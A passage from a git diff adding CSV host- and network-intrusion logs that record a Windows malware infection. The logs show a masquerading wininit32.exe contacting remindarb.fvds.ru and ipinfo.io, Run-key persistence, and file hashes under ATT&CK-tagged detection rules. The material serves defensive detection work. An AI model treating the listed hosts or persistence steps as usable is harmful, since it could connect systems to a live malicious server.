16:21:40.112\r\nProcessGuid: {df9fc3d3-41ca-5ecd-0000-001001f90300}\r\nProcessId: 3772\r\nImage: C:\\Users\\Public\\Documents\\wininit32.exe\r\nUser: DESKTOP-HUE026H\\John Williams\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 172.16.2.2\r\nSourceHostname: DESKTOP-HUE026H.localdomain\r\nSourcePort: 49718\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 216.239.36.21\r\nDestinationHostname: \r\nDestinationPort: 80\r\nDestinationPortName: http\""""},""eventdata"":{""ruleName"":""Usermode"",""utcTime"":""2020-05-26 16:21:40.112"",""processGuid"":""{df9fc3d3-41ca-5ecd-0000-001001f90300}"",""processId"":""3772"",""image"":""C:\\\\Users\\\\Public\\\\Documents\\\\wininit32.exe"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""protocol"":""tcp"",""initiated"":""true"",""sourceIsIpv6"":""false"",""sourceIp"":""172.16.2.2"",""sourceHostname"":""DESKTOP-HUE026H.localdomain"",""sourcePort"":""49718"",""destinationIsIpv6"":""false"",""destinationIp"":""216.239.36.21"",""destinationPort"":""80"",""destinationPortName"":""http""}}}", +"May 26, 2020 @ 16:21:41.455",14,"ATT&CK: Suspicious Program Location with Network Connections","""Network connection detected: +RuleName: Usermode +UtcTime: 2020-05-26 16:21:37.737 +ProcessGuid: {df9fc3d3-41ca-5ecd-0000-001001f90300} +ProcessId: 3772 +Image: C:\Users\Public\Documents\wininit32.exe +User: DESKTOP-HUE026H\John Williams +Protocol: tcp +Initiated: true +SourceIsIpv6: false +SourceIp: 172.16.2.2 +SourceHostname: DESKTOP-HUE026H.localdomain +SourcePort: 49717 +SourcePortName: +DestinationIsIpv6: false +DestinationIp: 91.240.87.131 +DestinationHostname: remindarb.fvds.ru +DestinationPort: 80 +DestinationPortName: http""",,,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""3"",""version"":""5"",""level"":""4"",""task"":""3"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-26T16:21:38.880873000Z"",""eventRecordID"":""1625"",""processID"":""2080"",""threadID"":""1180"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Network connection detected:\r\nRuleName: Usermode\r\nUtcTime: 2020-05-26 16:21:37.737\r\nProcessGuid: {df9fc3d3-41ca-5ecd-0000-001001f90300}\r\nProcessId: 3772\r\nImage: C:\\Users\\Public\\Documents\\wininit32.exe\r\nUser: DESKTOP-HUE026H\\John Williams\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 172.16.2.2\r\nSourceHostname: DESKTOP-HUE026H.localdomain\r\nSourcePort: 49717\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 91.240.87.131\r\nDestinationHostname: remindarb.fvds.ru\r\nDestinationPort: 80\r\nDestinationPortName: http\""""},""eventdata"":{""ruleName"":""Usermode"",""utcTime"":""2020-05-26 16:21:37.737"",""processGuid"":""{df9fc3d3-41ca-5ecd-0000-001001f90300}"",""processId"":""3772"",""image"":""C:\\\\Users\\\\Public\\\\Documents\\\\wininit32.exe"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""protocol"":""tcp"",""initiated"":""true"",""sourceIsIpv6"":""false"",""sourceIp"":""172.16.2.2"",""sourceHostname"":""DESKTOP-HUE026H.localdomain"",""sourcePort"":""49717"",""destinationIsIpv6"":""false"",""destinationIp"":""91.240.87.131"",""destinationHostname"":""remindarb.fvds.ru"",""destinationPort"":""80"",""destinationPortName"":""http""}}}", +"May 26, 2020 @ 16:21:37.798",14,"ATT&CK: Suspicious Program Location with Network Connections","""Network connection detected: +RuleName: Usermode +UtcTime: 2020-05-26 16:21:33.759 +ProcessGuid: {df9fc3d3-41ca-5ecd-0000-001001f90300} +ProcessId: 3772 +Image: C:\Users\Public\Documents\wininit32.exe +User: DESKTOP-HUE026H\John Williams +Protocol: tcp +Initiated: true +SourceIsIpv6: false +SourceIp: 172.16.2.2 +SourceHostname: DESKTOP-HUE026H.localdomain +SourcePort: 49715 +SourcePortName: +DestinationIsIpv6: false +DestinationIp: 91.240.87.131 +DestinationHostname: +DestinationPort: 80 +DestinationPortName: http""",,,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""3"",""version"":""5"",""level"":""4"",""task"":""3"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-26T16:21:34.974537900Z"",""eventRecordID"":""1623"",""processID"":""2080"",""threadID"":""1180"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Network connection detected:\r\nRuleName: Usermode\r\nUtcTime: 2020-05-26 16:21:33.759\r\nProcessGuid: {df9fc3d3-41ca-5ecd-0000-001001f90300}\r\nProcessId: 3772\r\nImage: C:\\Users\\Public\\Documents\\wininit32.exe\r\nUser: DESKTOP-HUE026H\\John Williams\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 172.16.2.2\r\nSourceHostname: DESKTOP-HUE026H.localdomain\r\nSourcePort: 49715\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 91.240.87.131\r\nDestinationHostname: \r\nDestinationPort: 80\r\nDestinationPortName: http\""""},""eventdata"":{""ruleName"":""Usermode"",""utcTime"":""2020-05-26 16:21:33.759"",""processGuid"":""{df9fc3d3-41ca-5ecd-0000-001001f90300}"",""processId"":""3772"",""image"":""C:\\\\Users\\\\Public\\\\Documents\\\\wininit32.exe"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""protocol"":""tcp"",""initiated"":""true"",""sourceIsIpv6"":""false"",""sourceIp"":""172.16.2.2"",""sourceHostname"":""DESKTOP-HUE026H.localdomain"",""sourcePort"":""49715"",""destinationIsIpv6"":""false"",""destinationIp"":""91.240.87.131"",""destinationPort"":""80"",""destinationPortName"":""http""}}}", +"May 26, 2020 @ 16:20:40.147",14,"ATT&CK T1036: Execution in Non-Executable Folder","""Process Create: +RuleName: +UtcTime: 2020-05-26 16:20:26.960 +ProcessGuid: {df9fc3d3-41ca-5ecd-0000-001001f90300} +ProcessId: 3772 +Image: C:\Users\Public\Documents\wininit32.exe +FileVersion: ? +Description: ? +Product: ? +Company: ? +OriginalFileName: ? +CommandLine: C:\ProgramData\Documents\wininit32.exe +CurrentDirectory: C:\ProgramData\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-41c7-5ecd-0000-00202b340300} +LogonId: 0x3342B +TerminalSessionId: 1 +IntegrityLevel: High +Hashes: MD5=B32FD85A86BB626F3BA68CCDAAA3FABD,SHA256=E9C29C057C95F3F03785C4CF0FE89D379EF72A382D5500DC769975A5D2E7C799,IMPHASH=00000000000000000000000000000000 +ParentProcessGuid: {df9fc3d3-41bf-5ecd-0000-0010404d0100} +ParentProcessId: 1168 +ParentImage: C:\Windows\System32\svchost.exe +ParentCommandLine: C:\Windows\system32\svchost.exe -k netsvcs -p""","C:\\ProgramData\\Documents\\wininit32.exe",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-26T16:20:30.395407600Z"",""eventRecordID"":""1552"",""processID"":""2080"",""threadID"":""3568"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-26 16:20:26.960\r\nProcessGuid: {df9fc3d3-41ca-5ecd-0000-001001f90300}\r\nProcessId: 3772\r\nImage: C:\\Users\\Public\\Documents\\wininit32.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: C:\\ProgramData\\Documents\\wininit32.exe\r\nCurrentDirectory: C:\\ProgramData\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-41c7-5ecd-0000-00202b340300}\r\nLogonId: 0x3342B\r\nTerminalSessionId: 1\r\nIntegrityLevel: High\r\nHashes: MD5=B32FD85A86BB626F3BA68CCDAAA3FABD,SHA256=E9C29C057C95F3F03785C4CF0FE89D379EF72A382D5500DC769975A5D2E7C799,IMPHASH=00000000000000000000000000000000\r\nParentProcessGuid: {df9fc3d3-41bf-5ecd-0000-0010404d0100}\r\nParentProcessId: 1168\r\nParentImage: C:\\Windows\\System32\\svchost.exe\r\nParentCommandLine: C:\\Windows\\system32\\svchost.exe -k netsvcs -p\""""},""eventdata"":{""utcTime"":""2020-05-26 16:20:26.960"",""processGuid"":""{df9fc3d3-41ca-5ecd-0000-001001f90300}"",""processId"":""3772"",""image"":""C:\\\\Users\\\\Public\\\\Documents\\\\wininit32.exe"",""fileVersion"":""?"",""description"":""?"",""product"":""?"",""company"":""?"",""originalFileName"":""?"",""commandLine"":""C:\\\\ProgramData\\\\Documents\\\\wininit32.exe"",""currentDirectory"":""C:\\\\ProgramData\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-41c7-5ecd-0000-00202b340300}"",""logonId"":""0x3342b"",""terminalSessionId"":""1"",""integrityLevel"":""High"",""hashes"":""MD5=B32FD85A86BB626F3BA68CCDAAA3FABD,SHA256=E9C29C057C95F3F03785C4CF0FE89D379EF72A382D5500DC769975A5D2E7C799,IMPHASH=00000000000000000000000000000000"",""parentProcessGuid"":""{df9fc3d3-41bf-5ecd-0000-0010404d0100}"",""parentProcessId"":""1168"",""parentImage"":""C:\\\\Windows\\\\System32\\\\svchost.exe"",""parentCommandLine"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p""}}}", +"May 26, 2020 @ 16:20:36.108",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",,,,, +"May 26, 2020 @ 16:20:25.053",7,"SessionEnv was unavailable to handle a critical notification event","""The winlogon notification subscriber was unavailable to handle a critical notification event.""",,,, +"May 26, 2020 @ 16:15:25.339",10,"Multiple Windows error events","""Id = {00000000-0000-0000-0000-000000000000}; ClientMachine = DESKTOP-HUE026H; User = DESKTOP-HUE026H\John Williams; ClientProcessId = 4272; Component = Unknown; Operation = Start IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory WHERE Tag='Physical Memory 0'; ResultCode = 0x80041032; PossibleCause = Unknown""",,,, diff --git a/data/MW_4_NIDS.csv b/data/MW_4_NIDS.csv new file mode 100644 index 0000000..2e2ba0f --- /dev/null +++ b/data/MW_4_NIDS.csv @@ -0,0 +1,9 @@ +"@timestamp",message,"log.file.path" +"May 26, 2020 @ 16:22:08.347","05/26-16:21:58.724406 [**] [1:2020716:2] ET POLICY Possible External IP Lookup ipinfo.io [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49718 -> 216.239.36.21:80","/var/log/snort/alert.fast" +"May 26, 2020 @ 16:22:08.346","05/26/2020-16:21:58.923989 [**] [1:2020716:5] ET POLICY Possible External IP Lookup ipinfo.io [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 172.16.2.2:49718 -> 216.239.36.21:80","/var/log/suricata/fast.log" +"May 26, 2020 @ 16:21:43.335","05/26-16:21:41.456169 [**] [1:2020716:2] ET POLICY Possible External IP Lookup ipinfo.io [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49718 -> 216.239.36.21:80","/var/log/snort/alert.fast" +"May 26, 2020 @ 16:21:43.334","05/26/2020-16:21:41.801699 [**] [1:2020716:5] ET POLICY Possible External IP Lookup ipinfo.io [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 172.16.2.2:49718 -> 216.239.36.21:80","/var/log/suricata/fast.log" +"May 26, 2020 @ 16:14:28.344","05/26-16:14:23.585943 [**] [1:2020716:2] ET POLICY Possible External IP Lookup ipinfo.io [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49743 -> 216.239.38.21:80","/var/log/snort/alert.fast" +"May 26, 2020 @ 16:14:28.326","05/26/2020-16:14:23.748423 [**] [1:2020716:5] ET POLICY Possible External IP Lookup ipinfo.io [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 172.16.2.2:49743 -> 216.239.38.21:80","/var/log/suricata/fast.log" +"May 26, 2020 @ 16:14:13.324","05/26/2020-16:14:07.747734 [**] [1:2020716:5] ET POLICY Possible External IP Lookup ipinfo.io [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 172.16.2.2:49743 -> 216.239.38.21:80","/var/log/suricata/fast.log" +"May 26, 2020 @ 16:14:13.314","05/26-16:14:07.583782 [**] [1:2020716:2] ET POLICY Possible External IP Lookup ipinfo.io [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49743 -> 216.239.38.21:80","/var/log/snort/alert.fast" diff --git a/data/MW_5_HIDS_3.csv b/data/MW_5_HIDS_3.csv new file mode 100644 index 0000000..1096c7a --- /dev/null +++ b/data/MW_5_HIDS_3.csv @@ -0,0 +1,125 @@ +timestamp,"rule.level","rule.description","data.win.system.message","data.win.eventdata.commandLine","data.win.eventdata.targetObject","full_log","data.win.eventdata.details" +"May 28, 2020 @ 10:04:55.501",12,"Sysmon - Suspicious Process - explorer.exe","""Process Create: +RuleName: +UtcTime: 2020-05-26 09:39:19.800 +ProcessGuid: {df9fc3d3-e3c7-5ecc-0000-00101ad44500} +ProcessId: 3744 +Image: C:\Windows\SysWOW64\explorer.exe +FileVersion: 10.0.18362.693 (WinBuild.160101.0800) +Description: Windows Explorer +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: EXPLORER.EXE +CommandLine: C:\Windows\SysWOW64\explorer.exe +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-dfe2-5ecc-0000-0020502d0300} +LogonId: 0x32D50 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=710CD555C00C29C59152DD50CAA553ED,SHA256=6E6E91554392595D18EE3D691258FC1D23E19DDC1E0BD6C26051DEBB8B70E5FD,IMPHASH=C3681D33DE70933393BD754BC4BCE962 +ParentProcessGuid: {df9fc3d3-e37f-5ecc-0000-001040364400} +ParentProcessId: 2272 +ParentImage: C:\Windows\SysWOW64\explorer.exe +ParentCommandLine: C:\Windows\SysWOW64\explorer.exe""","C:\\Windows\\SysWOW64\\explorer.exe",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-26T09:39:19.805618100Z"",""eventRecordID"":""1771"",""processID"":""2176"",""threadID"":""3312"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-26 09:39:19.800\r\nProcessGuid: {df9fc3d3-e3c7-5ecc-0000-00101ad44500}\r\nProcessId: 3744\r\nImage: C:\\Windows\\SysWOW64\\explorer.exe\r\nFileVersion: 10.0.18362.693 (WinBuild.160101.0800)\r\nDescription: Windows Explorer\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: EXPLORER.EXE\r\nCommandLine: C:\\Windows\\SysWOW64\\explorer.exe\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-dfe2-5ecc-0000-0020502d0300}\r\nLogonId: 0x32D50\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=710CD555C00C29C59152DD50CAA553ED,SHA256=6E6E91554392595D18EE3D691258FC1D23E19DDC1E0BD6C26051DEBB8B70E5FD,IMPHASH=C3681D33DE70933393BD754BC4BCE962\r\nParentProcessGuid: {df9fc3d3-e37f-5ecc-0000-001040364400}\r\nParentProcessId: 2272\r\nParentImage: C:\\Windows\\SysWOW64\\explorer.exe\r\nParentCommandLine: C:\\Windows\\SysWOW64\\explorer.exe\""""},""eventdata"":{""utcTime"":""2020-05-26 09:39:19.800"",""processGuid"":""{df9fc3d3-e3c7-5ecc-0000-00101ad44500}"",""processId"":""3744"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\explorer.exe"",""fileVersion"":""10.0.18362.693 (WinBuild.160101.0800)"",""description"":""Windows Explorer"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""EXPLORER.EXE"",""commandLine"":""C:\\\\Windows\\\\SysWOW64\\\\explorer.exe"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-dfe2-5ecc-0000-0020502d0300}"",""logonId"":""0x32d50"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=710CD555C00C29C59152DD50CAA553ED,SHA256=6E6E91554392595D18EE3D691258FC1D23E19DDC1E0BD6C26051DEBB8B70E5FD,IMPHASH=C3681D33DE70933393BD754BC4BCE962"",""parentProcessGuid"":""{df9fc3d3-e37f-5ecc-0000-001040364400}"",""parentProcessId"":""2272"",""parentImage"":""C:\\\\Windows\\\\SysWOW64\\\\explorer.exe"",""parentCommandLine"":""C:\\\\Windows\\\\SysWOW64\\\\explorer.exe""}}}", +"May 28, 2020 @ 10:04:07.923",12,"Sysmon - Suspicious Process - explorer.exe","""Process Create: +RuleName: +UtcTime: 2020-05-26 09:38:32.217 +ProcessGuid: {df9fc3d3-e398-5ecc-0000-001064334500} +ProcessId: 2200 +Image: C:\Windows\SysWOW64\explorer.exe +FileVersion: 10.0.18362.693 (WinBuild.160101.0800) +Description: Windows Explorer +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: EXPLORER.EXE +CommandLine: C:\Windows\SysWOW64\explorer.exe +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-dfe2-5ecc-0000-0020502d0300} +LogonId: 0x32D50 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=710CD555C00C29C59152DD50CAA553ED,SHA256=6E6E91554392595D18EE3D691258FC1D23E19DDC1E0BD6C26051DEBB8B70E5FD,IMPHASH=C3681D33DE70933393BD754BC4BCE962 +ParentProcessGuid: {df9fc3d3-e37f-5ecc-0000-001040364400} +ParentProcessId: 2272 +ParentImage: C:\Windows\SysWOW64\explorer.exe +ParentCommandLine: C:\Windows\SysWOW64\explorer.exe""","C:\\Windows\\SysWOW64\\explorer.exe",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-26T09:38:32.219753200Z"",""eventRecordID"":""1769"",""processID"":""2176"",""threadID"":""3312"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-26 09:38:32.217\r\nProcessGuid: {df9fc3d3-e398-5ecc-0000-001064334500}\r\nProcessId: 2200\r\nImage: C:\\Windows\\SysWOW64\\explorer.exe\r\nFileVersion: 10.0.18362.693 (WinBuild.160101.0800)\r\nDescription: Windows Explorer\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: EXPLORER.EXE\r\nCommandLine: C:\\Windows\\SysWOW64\\explorer.exe\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-dfe2-5ecc-0000-0020502d0300}\r\nLogonId: 0x32D50\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=710CD555C00C29C59152DD50CAA553ED,SHA256=6E6E91554392595D18EE3D691258FC1D23E19DDC1E0BD6C26051DEBB8B70E5FD,IMPHASH=C3681D33DE70933393BD754BC4BCE962\r\nParentProcessGuid: {df9fc3d3-e37f-5ecc-0000-001040364400}\r\nParentProcessId: 2272\r\nParentImage: C:\\Windows\\SysWOW64\\explorer.exe\r\nParentCommandLine: C:\\Windows\\SysWOW64\\explorer.exe\""""},""eventdata"":{""utcTime"":""2020-05-26 09:38:32.217"",""processGuid"":""{df9fc3d3-e398-5ecc-0000-001064334500}"",""processId"":""2200"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\explorer.exe"",""fileVersion"":""10.0.18362.693 (WinBuild.160101.0800)"",""description"":""Windows Explorer"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""EXPLORER.EXE"",""commandLine"":""C:\\\\Windows\\\\SysWOW64\\\\explorer.exe"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-dfe2-5ecc-0000-0020502d0300}"",""logonId"":""0x32d50"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=710CD555C00C29C59152DD50CAA553ED,SHA256=6E6E91554392595D18EE3D691258FC1D23E19DDC1E0BD6C26051DEBB8B70E5FD,IMPHASH=C3681D33DE70933393BD754BC4BCE962"",""parentProcessGuid"":""{df9fc3d3-e37f-5ecc-0000-001040364400}"",""parentProcessId"":""2272"",""parentImage"":""C:\\\\Windows\\\\SysWOW64\\\\explorer.exe"",""parentCommandLine"":""C:\\\\Windows\\\\SysWOW64\\\\explorer.exe""}}}", +"May 28, 2020 @ 10:03:43.219",12,"Sysmon - Suspicious Process - explorer.exe","""Process Create: +RuleName: +UtcTime: 2020-05-26 09:38:07.507 +ProcessGuid: {df9fc3d3-e37f-5ecc-0000-001040364400} +ProcessId: 2272 +Image: C:\Windows\SysWOW64\explorer.exe +FileVersion: 10.0.18362.693 (WinBuild.160101.0800) +Description: Windows Explorer +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: EXPLORER.EXE +CommandLine: C:\Windows\SysWOW64\explorer.exe +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-dfe2-5ecc-0000-0020502d0300} +LogonId: 0x32D50 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=710CD555C00C29C59152DD50CAA553ED,SHA256=6E6E91554392595D18EE3D691258FC1D23E19DDC1E0BD6C26051DEBB8B70E5FD,IMPHASH=C3681D33DE70933393BD754BC4BCE962 +ParentProcessGuid: {df9fc3d3-e37b-5ecc-0000-0010e4c94300} +ParentProcessId: 2740 +ParentImage: C:\Users\John Williams\AppData\Roaming\Microsoft\Eofgx\ywpeoq.exe +ParentCommandLine: ""C:\Users\John Williams\AppData\Roaming\Microsoft\Eofgx\ywpeoq.exe""""","C:\\Windows\\SysWOW64\\explorer.exe",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-26T09:38:07.510583000Z"",""eventRecordID"":""1766"",""processID"":""2176"",""threadID"":""3312"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-26 09:38:07.507\r\nProcessGuid: {df9fc3d3-e37f-5ecc-0000-001040364400}\r\nProcessId: 2272\r\nImage: C:\\Windows\\SysWOW64\\explorer.exe\r\nFileVersion: 10.0.18362.693 (WinBuild.160101.0800)\r\nDescription: Windows Explorer\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: EXPLORER.EXE\r\nCommandLine: C:\\Windows\\SysWOW64\\explorer.exe\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-dfe2-5ecc-0000-0020502d0300}\r\nLogonId: 0x32D50\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=710CD555C00C29C59152DD50CAA553ED,SHA256=6E6E91554392595D18EE3D691258FC1D23E19DDC1E0BD6C26051DEBB8B70E5FD,IMPHASH=C3681D33DE70933393BD754BC4BCE962\r\nParentProcessGuid: {df9fc3d3-e37b-5ecc-0000-0010e4c94300}\r\nParentProcessId: 2740\r\nParentImage: C:\\Users\\John Williams\\AppData\\Roaming\\Microsoft\\Eofgx\\ywpeoq.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\AppData\\Roaming\\Microsoft\\Eofgx\\ywpeoq.exe\""\""""},""eventdata"":{""utcTime"":""2020-05-26 09:38:07.507"",""processGuid"":""{df9fc3d3-e37f-5ecc-0000-001040364400}"",""processId"":""2272"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\explorer.exe"",""fileVersion"":""10.0.18362.693 (WinBuild.160101.0800)"",""description"":""Windows Explorer"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""EXPLORER.EXE"",""commandLine"":""C:\\\\Windows\\\\SysWOW64\\\\explorer.exe"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-dfe2-5ecc-0000-0020502d0300}"",""logonId"":""0x32d50"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=710CD555C00C29C59152DD50CAA553ED,SHA256=6E6E91554392595D18EE3D691258FC1D23E19DDC1E0BD6C26051DEBB8B70E5FD,IMPHASH=C3681D33DE70933393BD754BC4BCE962"",""parentProcessGuid"":""{df9fc3d3-e37b-5ecc-0000-0010e4c94300}"",""parentProcessId"":""2740"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Roaming\\\\Microsoft\\\\Eofgx\\\\ywpeoq.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Roaming\\\\Microsoft\\\\Eofgx\\\\ywpeoq.exe\\\""""}}}", +"May 28, 2020 @ 10:03:08.010",10,"ATT&CK T1060: Autorun Keys Modification","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-26 09:37:32.291 +ProcessGuid: {df9fc3d3-e198-5ecc-0000-00109c992e00} +ProcessId: 3556 +Image: C:\Windows\SysWOW64\explorer.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\wrzaxthjp +Details: ""C:\Users\John Williams\AppData\Roaming\Microsoft\Eofgx\ywpeoq.exe""""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\wrzaxthjp","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-26T09:37:32.292211100Z"",""eventRecordID"":""1745"",""processID"":""2176"",""threadID"":""3312"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-26 09:37:32.291\r\nProcessGuid: {df9fc3d3-e198-5ecc-0000-00109c992e00}\r\nProcessId: 3556\r\nImage: C:\\Windows\\SysWOW64\\explorer.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\wrzaxthjp\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Roaming\\Microsoft\\Eofgx\\ywpeoq.exe\""\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-26 